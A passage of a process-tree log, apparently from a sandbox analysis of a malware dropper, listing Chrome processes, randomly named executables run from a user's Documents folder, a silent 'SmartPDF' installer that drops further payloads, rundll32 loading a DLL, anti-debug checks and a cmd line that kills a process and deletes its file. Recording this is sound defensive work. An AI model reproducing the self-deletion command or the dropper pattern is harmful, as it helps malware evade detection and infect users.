C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:14⤵PID:13112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:14⤵PID:10272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:14⤵PID:13224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3808 /prefetch:84⤵PID:13976
-
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings4⤵PID:2248
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff68abaa890,0x7ff68abaa8a0,0x7ff68abaa8b05⤵PID:10336
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4904 /prefetch:84⤵PID:12796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4856 /prefetch:84⤵PID:8124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 /prefetch:84⤵PID:11672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,2058154454567815226,16687973107209268111,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4692 /prefetch:24⤵PID:14352
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 2204 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\yPPvcHeJx5BXut4bjVmApamW.exe"3⤵PID:7576
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 22044⤵
- Kills process with taskkill
PID:9928
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 2204 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\yPPvcHeJx5BXut4bjVmApamW.exe"3⤵PID:5116
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 22044⤵
- Kills process with taskkill
PID:11692
-
-
-
-
C:\Users\Admin\Documents\5pkW9vwRA5kdv26inNNIRYvj.exe"C:\Users\Admin\Documents\5pkW9vwRA5kdv26inNNIRYvj.exe"2⤵
- Executes dropped EXE
PID:2284
-
-
C:\Users\Admin\Documents\oyPn9ag3coYhFZms71V5xBnt.exe"C:\Users\Admin\Documents\oyPn9ag3coYhFZms71V5xBnt.exe"2⤵
- Executes dropped EXE
PID:3756
-
-
C:\Users\Admin\Documents\LM2I2uM4PPppb9fXMHQIkSy1.exe"C:\Users\Admin\Documents\LM2I2uM4PPppb9fXMHQIkSy1.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1808
-
-
C:\Users\Admin\Documents\YzrXlWxGcfDrjSJ9FX7AEpid.exe"C:\Users\Admin\Documents\YzrXlWxGcfDrjSJ9FX7AEpid.exe"2⤵
- Executes dropped EXE
PID:3664 -
C:\Users\Admin\AppData\Roaming\3846333.exe"C:\Users\Admin\AppData\Roaming\3846333.exe"3⤵PID:6028
-
-
C:\Users\Admin\AppData\Roaming\4020854.exe"C:\Users\Admin\AppData\Roaming\4020854.exe"3⤵PID:4184
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 9484⤵
- Program crash
PID:6760
-
-
-
C:\Users\Admin\AppData\Roaming\3716133.exe"C:\Users\Admin\AppData\Roaming\3716133.exe"3⤵PID:5992
-
-
C:\Users\Admin\AppData\Roaming\3750875.exe"C:\Users\Admin\AppData\Roaming\3750875.exe"3⤵PID:6156
-
-
C:\Users\Admin\AppData\Roaming\6900247.exe"C:\Users\Admin\AppData\Roaming\6900247.exe"3⤵PID:2288
-
-
-
C:\Users\Admin\Documents\z7H850R0Uuou0ctFUCuamKLJ.exe"C:\Users\Admin\Documents\z7H850R0Uuou0ctFUCuamKLJ.exe"2⤵PID:4852
-
-
C:\Users\Admin\AppData\Local\Temp\is-HS67F.tmp\z7H850R0Uuou0ctFUCuamKLJ.tmp"C:\Users\Admin\AppData\Local\Temp\is-HS67F.tmp\z7H850R0Uuou0ctFUCuamKLJ.tmp" /SL5="$20298,138429,56832,C:\Users\Admin\Documents\z7H850R0Uuou0ctFUCuamKLJ.exe"1⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\is-LHO9C.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LHO9C.tmp\Setup.exe" /Verysilent2⤵PID:6928
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"3⤵PID:15032
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Spadille.exe"4⤵PID:16636
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\lg.exe"3⤵PID:16924
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"3⤵PID:16512
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\PBrowFile15.exe"3⤵PID:17084
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\9840432e051a6fa1192594db02b80a4c1fd73456.exe"3⤵PID:17364
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent3⤵PID:6460
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"3⤵PID:11400
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:9044 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:9068
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:6604
-
C:\Users\Admin\AppData\Local\Temp\is-2AI7C.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-2AI7C.tmp\stats.tmp" /SL5="$205BA,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent1⤵PID:16368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16692 -s 241⤵
- Program crash
PID:11596